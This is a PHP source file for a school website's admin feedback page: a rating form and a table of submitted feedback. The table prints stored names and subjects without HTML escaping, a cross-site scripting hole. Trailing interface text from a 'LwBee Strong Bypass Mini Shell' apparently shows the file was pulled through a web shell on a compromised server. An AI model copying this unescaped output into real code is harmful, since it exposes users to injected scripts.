/home3/vehiclea/public_html/admin-appleiitfoundationschools-com/feedback.php
<?php
include('include/header.php');
if(!empty($_POST['submit'])){
 feedback();
}

?>
<main id="main" class="main">

<div class="pagetitle">
      <h1>School Data</h1>
  <nav>
    <ol class="breadcrumb">
      <li class="breadcrumb-item"><a href="index.php">Home</a></li>
      <li class="breadcrumb-item active">Feedback</li>
    </ol>
  </nav>
</div>
<section class="section">
      <div class="row">
        <div class="col-lg-12">
           <?php
              if(!empty($_GET['succ'])){
                 ?>
                   <div style="color:green; text-align:center;"><strong>Data Insert Successfully</strong></div>
                 <?php
              }
           ?>
          <div class="card">
            <div class="card-body"> 
              <h5 class="card-title">Feedback</h5>
              
        <form method="post" onsubmit=" return book_validation()">
               <div class="row">  
                         <div class="col-md-3">
                         <label  class="form-label">First Name</label>
                        <input type="text" class="form-control noSpace" id="fname" name="fname" placeholder="Enter First Name">
                    </div>
                    <div class="col-md-3">
                         <label  class="form-label">Last Name</label>
                        <input type="text" class="form-control noSpace" id="lname" name="lname" placeholder="Enter Last Name">
                    </div>

                    <div class="col-md-3">
                         <label  class="form-label">Enter subject</label>
                        <input type="text" class="form-control noSpace" id="subject" name="subject" placeholder="Enter Subject Name">
                    </div>

                    <div class="col-md-3">
                        <label for="Gender" class="form-label">Feedback</label><br>
                        <input type="radio" id=" feedback" name="feedback" value="5" >
                        <label for="excellent">Excellent</label>
                        <input type="radio" id=" feedback" name="feedback" value="4">
                        <label for="verygood">VeryGood</label>
                        <input type="radio" id=" feedback" name="feedback" value="3">
                        <label for="good">Good</label>
                        <input type="radio" id=" feedback" name="feedback" value="2">
                        <label for="average">Average</label>
                        <input type="radio" id=" feedback" name="feedback" value="1">
                        <label for="bad">Bad</label>
                    </div>
                    <div class="mt-4">
                        <input type="submit" class="btn btn-primary" value="Submit" name="submit">
                    </div>
                </form>
                
                <h5 class="card-title">Reports</h5>


<table class="table datatable">
<thead>
 <tr> 
   <th scope="col">S.No</th> 
   <th scope="col">First Name</th>
   <th scope="col">Last Name </th>
   <th scope="col">Subject</th>
   <th scope="col">Feedback</th> 
  
 </tr>
</thead> 
       <tbody>
       <?php
       $i=1; 
          while ($feedback_select_date = mysqli_fetch_array($feedback_select)) 
            { 
       ?>
       <tr>
         <td><?php echo $i;?></td>

         <td><?php echo ucfirst($feedback_select_date['fname']) ?></td>
         <td><?php echo ucfirst($feedback_select_date['lname']) ?></td>
         <td><?php echo ucfirst($feedback_select_date['subject']) ?></td>
         <td><?php echo ucfirst($feedback_select_date['feedback']) ?></td>
           
       </tr>
       <?php
            $i++;
            }
       ?>
    </tbody>
  </table> 

</div>
</div>
</div>
</div>
</div>
</section>

<?php include('include/footer.php'); ?>
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File